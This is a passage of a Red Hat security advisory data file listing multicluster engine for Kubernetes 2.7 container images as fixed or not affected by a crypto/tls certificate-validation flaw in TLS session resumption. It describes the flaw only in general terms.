"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437111"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is a moderate flaw because it only occurs under specific conditions, such as TLS session resumption with runtime changes to certificate authority settings. Exploitation is not straightforward and requires a controlled setup. The impact is limited to certificate validation within the same component and does not affect system availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le"
],
"known_not_affected": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
